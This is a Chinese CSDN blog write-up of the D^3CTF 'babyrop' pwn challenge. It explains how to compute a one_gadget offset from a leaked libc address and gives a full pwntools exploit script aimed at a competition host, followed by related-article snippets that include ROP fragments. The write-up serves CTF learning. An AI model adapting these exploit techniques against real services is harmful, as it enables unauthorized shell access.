D^3CTF babyrop 经验总结

最新推荐文章于 2024-05-23 12:38:45 发布
最新推荐文章于 2024-05-23 12:38:45 发布
阅读量590 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/103303984
版权

思路:
调试时发现在栈中有一个libc_start_main的地址
在这里插入图片描述
可以根据这个地址算出距one_gadget 的偏移
在这里插入图片描述
得到这个偏移后再让libc_start_main这个地址加上这个偏移即可得到one_gaget的地址, 之后再用这个地址覆盖ret即可getshell, 需要注意的是要满足one_gadget的约束条件, 我选则的是偏移为0x4526a 处的one_gadget, 所以需要保证[rsp + 0x30] == NULL 满足

调用的相关函数:

使栈中的数据相加
在这里插入图片描述
调整 “栈指针”, 使"栈指针"想上移动
在这里插入图片描述
向栈中写入零
在这里插入图片描述

还需要注意的是检查的数据的类型是无符号数, 在多次调用0x28指令后
前三个入栈的指令都无法执行, 所以要通过其它指令来达到写零与覆写ret的目的
在这里插入图片描述

EXP:

from pwn import *

context(arch='amd64', os='linux', terminal=['tmux', 'splitw', '-h'])
context.log_level='debug'
debug = 1
d = 1

execve = "./babyrop"
if debug == 1:
	p = process(execve)
	if d == 1:
		gdb.attach(p)
else:
	p = remote("106.54.67.184", 15924)

#0x28 -> *(_DWORD*)(a3 + 16) = 0
#0x42 -> *a1 - 8
#0x34 -> *a1 - 8, copy stack data

payload = '\x28\x28\x28' + '\x34'*12 + '\x56' + p32(0x24a3a) + '\x21' + '\x34\x34\x34\x34\x34'
p.sendline(payload)

'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
    [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
	[rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
	 [rsp+0x70] == NULL
'''

raw_input()

p.interactive()

复现结果:
在这里插入图片描述

苍崎青子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【BUUCTF - PWN】babyrop
古月浪子的博客
03-25 1737
checksec一下,可以栈溢出 IDA打开看看,读取随机数作为参数传入函数中 读取输入,进行字符串比较,不同则退出,相同则返回输入的第8个字节,可以通过输入 \0 绕过字符串比较 返回的字节作为read的长度,buf只有231字节,可以通过传入255来栈溢出,然后就是标准的ret2libc了 from pwn import * from LibcSearcher import * co...
CTF笔记:ROP技术
PwnGuo的博客
05-19 667
Security Fest CTF 2016-tvstation 程序执行情况 运行程序发现菜单只有3个选项,但实际在IDA分析可见有选项4. 并且选项4中debug()函数输出system在内存中地址 查看返回值debug_func()函数,明显存在溢出点。 .text节(Section)属于第一个LOAD段(Segment),这个段的文件长度和内存长度是一样的,也就是说所有的代码都是原样映射到内存中,代码之间的相对偏移是不会改变的。由于前面的...
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3539
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
CTF比赛总结(小白必看)
最新发布
qq_53272273的博客
05-23 1235
它被设计为tcpdump 和其他使用 libpcap 库的软件使用的原始 PCAP格式的可扩展继承者.目前,只有 Wireshark 可以读取和写入 PCAPNG 文件,而 libpcap(以及使用它的软件)只能读取其中一些文件。:用16进制编辑工具更改图片的高度,会只显示图片的一部分,下面的部分就被隐藏了,可以先看看图片的属性,得到宽高值,找表示宽度和高度的位置的再转成16进制。特征:文由0和1构成,可能由空格、tab或则其他字符分割,去掉这些分割后,0和1的总数是5的倍数。
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 692
bjdctf_2020_babyrop
CTF-PWN-栈溢出-中级ROP-【栈迁移】
llovewuzhengzi的博客
01-09 1294
所以此时的gadget应该是能够进行栈迁移的,即为待会要改到的rsp值+修改参数的gadget+read函数+leave_ret,此时由于想直接用程序内的gadget来构造参数,此时可以以原函数开始准备read函数调用的地址作为调用read函数地址,此时可以参数构造就不要担心需要找gadget或者直接利用read函数后rdi rsi rdx没有被修改的特点从而只修改rsi即可,正好存在这样的gadget(main函数ret结束前调用的最后一个函数是向bss段输入数据)。
D^3CTF 2019 Challenges.zip
08-16
D^3CTF 2019 CTF
Ant x D^3 CTF Official Writeup.pdf
03-22
Ant x D^3 CTF Official Writeup.pdf
D3CTF2022-官方WriteUp1
08-03
本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User-Defined Functions(UDF)...
CTF常见密码总结.docx
04-10
在ctf解题中总结的一些实用的密码(编码方式),非常适合刚入坑的新手参考学习。比如常见的栅栏密码,摩斯电码,还有一些不常见的比如培根密码等等等等,非常全面!!!
CTF隐写详细总结,自带ctf工具集
11-30
CTF隐写详细总结,自带ctf工具集。 0、图片隐写 1、音频隐写 波形隐写 频谱隐写 LSB隐写 2、视频隐写 3、Base64隐写 4、Python代码隐写 5、Pdf隐写 6、Office文档隐写 7、Ntfs数据流隐写
ctfphpml.php,Bytectf-几道web总结
weixin_39929877的博客
04-14 373
1.EZcms这道题思路挺明确,给了源码,考点就是md5哈希扩展+phar反序列化首先这道题会在上传的文件目录下生成无效的.htaccess,从而导致无法执行上传的webshell,所以就需要想办法删除掉.htaccess这里主要记录一点,利用php内置类进行文件操作,exp为:class File{public $filename;public $filepath;public $checker...
ctf-wiki 基本ROP
农夫果园好好喝的博客
07-11 453
ret2text 原理:ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 流程...
CTF-PWN-ROPbaby(实验吧)
SuperGate的博客
02-07 1851
学rop的时候刷到的题,感觉很有启发于是就写下来。 本文很大程度上借鉴了如下文章: http://wzt.ac.cn/2018/04/02/ROP/ 进入正题。我们发现题目中给了我们libc的文件,在ropbaby程序中也可以直接查找libc基地址,因此我们就可以不用在主程序中寻找了。 首先我们查看ropbaby文件的保护方式 由于开了NX,shellcode的方式就不好弄了,因此我...
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2563
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
buuctf babyrop
carol2358的博客
04-08 569
pwn菜鸡争取一天写一道吧,记录一下做题过程,方便复现 先checksec ida f5 大致的流程就是先生成一个随机数,然后将这个随机数放入buf,再把buf传到71F 在71F里,buf变成a1,把a1放入s,然后往71F的buf里输入数据,这一步要注意,我们要做的是通过传入数据,把v5覆盖掉,因为返回值是v5,而v5和buf的关系在stack里是这样的 所以我们传入7个以上的字节(...
bjdctf2020 babyrop
pondzhang的专栏
05-09 296
from pwn import * p = process('./bjdctf_2020_babyrop') libcelf = ELF('./libc-2.23.so') pop_rdi_ret = 0x0000000000400733 pop_rsi_r15_ret = 0x0000000000400731 pltputs = 0x00000000004004E0 main = 0x00000000004006AD gotputs = 0x0000000000601018 payload = 'a' *
第十三届全国大学生信息安全竞赛 2020CISCN 线上初赛Writeup
末初的CSDN博客
09-06 5388
第十三届全国大学生信息安全竞赛
基本ROP技巧总结
极目楚天舒的博客
05-06 5622
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...
005-CTF web题型总结-第五课 CTF WEB实战练习(一).pdf
07-09
"005-CTF web题型总结-第五课 CTF WEB实战练习(一).pdf" 本文档是对CTF(Capture The Flag)网络安全竞赛中Web题型的总结,主要聚焦于Bugku平台上的实战练习。这些题目旨在帮助初学者熟悉Web安全的基本概念和技术,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值